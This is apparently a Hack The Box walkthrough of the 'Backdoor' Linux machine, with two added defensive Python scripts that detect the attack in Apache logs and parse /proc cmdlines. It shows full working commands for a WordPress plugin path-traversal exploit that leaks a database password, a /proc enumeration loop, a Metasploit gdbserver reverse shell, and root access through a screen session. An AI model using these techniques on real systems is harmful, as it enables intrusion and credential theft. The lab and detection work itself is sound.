Backdoor - [HTB]


    Backdoor is a Linux machine where the attacker has to discover the commands running on the box through an LFI in a WordPress plugin. Finally, to become root, one has to attach to a screen session that is running as root.


    As always, let's start by finding all open ports on the machine with Nmap.

    kali@kali:~/Documents/HTB/backdoor$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.18s latency).
    Not shown: 65532 closed tcp ports (reset)
    22/tcp   open  ssh
    80/tcp   open  http
    1337/tcp open  waste
    Read data files from: /usr/bin/../share/nmap
    # Nmap done at Mon Nov 22 12:27:33 2021 -- 1 IP address (1 host up) scanned in 371.30 seconds

    Then we continue with a deeper scan of every open port, getting more information about each service.

    kali@kali:~/Documents/HTB/backdoor$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,1337
    Nmap scan report for
    Host is up (0.18s latency).
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
    |   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
    |_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Backdoor – Real-Life
    |_http-generator: WordPress 5.8.1
    1337/tcp open  waste?
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Looking for domain names on the web page, we find backdoor.htb.

    kali@kali:~/Documents/HTB/backdoor$ curl | grep --color .htb
    u-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="http://backdoor.htb/">Home</a></li> 

    Enumerating WordPress with WPScan, we find an installed plugin.

    kali@kali:~/Documents/HTB/backdoor$ wpscan --url http://backdoor.htb/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
    [+] ebook-download
     | Location: http://www.backdoor.htb/wp-content/plugins/ebook-download/
     | Last Updated: 2020-03-12T12:52:00.000Z
     | Readme: http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
     | [!] The version is out of date, the latest version is 1.5
     | [!] Directory listing is enabled
     | Found By: Known Locations (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/, status: 200
     | Version: 1.1 (100% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
     | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt


    The Ebook Download plugin has a known path traversal vulnerability listed on Exploit-DB; the following command exploits it to read wp-config.php, including the database credentials:

    kali@kali:~/Documents/HTB/backdoor$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
    /** MySQL database username */                                                 
    define( 'DB_USER', 'wordpressuser' );                                          
    /** MySQL database password */                                                 
    define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
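    From the defender's side, every request in this write-up goes through the same script and parameter, so it leaves a clear trace in the Apache access log. The following script is an added example, not part of the original write-up: it parses combined-format access log lines, looks at the ebookdownloadurl parameter of filedownload.php, and flags both the "../" traversal used above and absolute paths (which the /proc enumeration later in the write-up relies on, with no "../" at all). The log lines are constructed for the example; the plugin path and parameter name are the ones shown above.

```python
"""Flag LFI attempts against the ebook-download plugin in Apache access logs.

Added example, not part of the original write-up. The log lines below are
constructed; the request shape (filedownload.php?ebookdownloadurl=...) is the
one shown in the write-up.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client ident user [timestamp] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

VULN_SCRIPT = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"


def classify_target(target):
    """Return the reasons a request target looks like an LFI attempt (empty list if benign)."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return []
    reasons = []
    for value in parse_qs(parts.query).get(PARAM, []):
        # unquote twice so a double-encoded "%252e%252e/" still normalizes to "../"
        decoded = unquote(unquote(value)).replace("\\", "/")
        if "../" in decoded:
            reasons.append("traversal")
        if decoded.startswith("/"):
            reasons.append("absolute-path")
        if decoded.startswith("/proc/"):
            reasons.append("proc-read")
    return sorted(set(reasons))


def scan_log(lines):
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_target(m["target"])
        if reasons:
            findings.append({"client": m["client"], "ts": m["ts"],
                             "target": m["target"], "status": m["status"],
                             "reasons": reasons})
    return findings


def per_client_counts(findings):
    """Suspicious requests per client; a /proc sweep shows up as a burst from one address."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


# Constructed sample log lines (not real traffic from the box).
SAMPLE_LOG = [
    '10.10.14.5 - - [22/Nov/2021:12:40:01 -0500] "GET / HTTP/1.1" 200 5123 "-" "curl/7.79.1"',
    '10.10.14.5 - - [22/Nov/2021:12:40:09 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3245 "-" "curl/7.79.1"',
    '10.10.14.5 - - [22/Nov/2021:12:41:00 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/957/cmdline HTTP/1.1" 200 201 "-" "curl/7.79.1"',
    '10.10.14.5 - - [22/Nov/2021:12:41:01 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/959/cmdline HTTP/1.1" 200 199 "-" "curl/7.79.1"',
    '10.10.14.9 - - [22/Nov/2021:12:42:30 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/sample.pdf HTTP/1.1" 200 88210 "http://backdoor.htb/" "Mozilla/5.0"',
    '10.10.14.9 - - [22/Nov/2021:12:43:00 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252e%252e%2f%252e%252e%2fwp-config.php HTTP/1.1" 200 3245 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["client"], ",".join(f["reasons"]), f["target"])
    print(per_client_counts(found))
```

    Matching on "../" alone would miss the /proc sweep, which is why the absolute-path check is there; the legitimate relative download (books/sample.pdf) is not flagged. A real deployment would read the log from disk and feed the counts into whatever alerting is in place.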

    Exploitation 2

    Port 1337 is very common in CTFs, so there may be a custom binary listening on it.

    To find the command being executed, we can take advantage of the path traversal vulnerability to iterate over the /proc/ directory and read each process's cmdline.

    After some time, we see that gdbserver is the process listening on port 1337.

    kali@kali:~/Documents/HTB/backdoor$ for i in {1..10000}; do echo $i; curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline 2>/dev/null | grep -v window.close ; done
    /proc/957/cmdline/proc/957/cmdline/proc/957/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>w
    /proc/959/cmdline/proc/959/cmdline/proc/959/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once /bin/true;"; done<script>win
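    The loop output above runs the arguments together because /proc/<pid>/cmdline stores argv as NUL-separated strings, which the terminal does not display. The following script is an added example, not part of the original write-up: it shows how a triage script on the host side would parse those bytes back into argv, pull the script out of a `sh -c` wrapper, and report the "while true" loops that are keeping gdbserver and screen alive. The sample bytes are constructed from the two commands shown above; read_proc_cmdlines() reads a live /proc and is not exercised by the sample.

```python
"""Parse /proc/<pid>/cmdline and report shell loops running on a host.

Added example, not part of the original write-up. The sample cmdlines are
constructed from the two processes shown in the write-up.
"""
import os

# Constructed sample: raw bytes as the kernel presents them (NUL-separated, trailing NUL).
SAMPLE_CMDLINES = {
    1: b"/sbin/init\x00",
    957: b"/bin/sh\x00-c\x00while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \\;; done\x00",
    959: b'/bin/sh\x00-c\x00while true;do su user -c "cd /home/user;gdbserver --once /bin/true;"; done\x00',
}


def parse_cmdline(raw):
    """Split the NUL-separated argv of /proc/<pid>/cmdline into a list of strings."""
    if not raw:
        return []  # kernel threads have an empty cmdline
    return [arg.decode("utf-8", "replace") for arg in raw.rstrip(b"\x00").split(b"\x00")]


def inner_shell_command(argv):
    """If argv is `sh -c <script>`, return <script>; that loop body is what an analyst cares about."""
    if len(argv) >= 3 and os.path.basename(argv[0]) in {"sh", "bash", "dash"} and argv[1] == "-c":
        return argv[2]
    return None


def read_proc_cmdlines(procfs="/proc"):
    """Read the cmdline of every numeric entry under procfs (live Linux host only)."""
    result = {}
    for name in os.listdir(procfs):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(procfs, name, "cmdline"), "rb") as fh:
                result[int(name)] = fh.read()
        except OSError:
            continue  # process exited or is not readable by this user
    return result


def find_shell_loops(cmdlines):
    """Return {pid: script} for every process that is a shell running a `while true` loop."""
    hits = {}
    for pid, raw in cmdlines.items():
        script = inner_shell_command(parse_cmdline(raw))
        if script and "while true" in script:
            hits[pid] = script
    return hits


if __name__ == "__main__":
    for pid, script in sorted(find_shell_loops(SAMPLE_CMDLINES).items()):
        print(f"pid {pid}: {script}")
```

    On the box, pid 959 is the loop that restarts gdbserver every time a client disconnects, which is what turns a debugging helper into a permanent network-reachable code execution path; a periodic run of find_shell_loops() over a live /proc is a cheap way to surface such wrappers.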

    Metasploit has a module for gdbserver that gives us a reverse shell as "user".

    msf6 > use multi/gdb/gdb_server_exec
    msf6 exploit(multi/gdb/gdb_server_exec) > options
    Module options (exploit/multi/gdb/gdb_server_exec):
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
       RHOSTS    backdoor.htb     yes       The target host(s), see
       RPORT     1337             yes       The target port (TCP)
    Payload options (linux/x64/shell_reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST     yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       1   x86_64 (64-bit)
    msf6 exploit(multi/gdb/gdb_server_exec) > exploit
    [*] Started reverse TCP handler on 
    [*] - Performing handshake with gdbserver...
    [*] - Stepping program to find PC...
    [*] - Writing payload at 00007ffff7fd0103...
    [*] - Executing the payload...
    [*] Command shell session 6 opened ( -> ) at 2021-11-22 14:22:35 -0500
    uid=1000(user) gid=1000(user) groups=1000(user)

    Privilege Escalation

    Enumerating with LinPEAS, we see that root is running an infinite loop that keeps a detached screen session alive.

    root         957  0.0  0.0   2608  1756 ?        Ss   11:19   0:14      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -d mS root ;; done

    To attach to that root screen session, we run the following command, which attaches to root's session named "root".

    screen -x root/root 
    Must be connected to a terminal.

    However, screen requires a proper terminal, so we first spawn a pty and set TERM; after that, attaching to the session gives us a root shell.

    $ python3 -c "import pty;pty.spawn('/bin/bash')"
    user@Backdoor:/home/user$ screen -x root
    screen -x root
    Please set a terminal type.
    user@Backdoor:/home/user$ export TERM=xterm
    export TERM=xterm
    user@Backdoor:/home/user$ screen -x root
    screen -x root
    There is no screen to be attached matching root.
    user@Backdoor:/home/user$ screen -x root/root
    root@Backdoor:~# cat /root/root.txt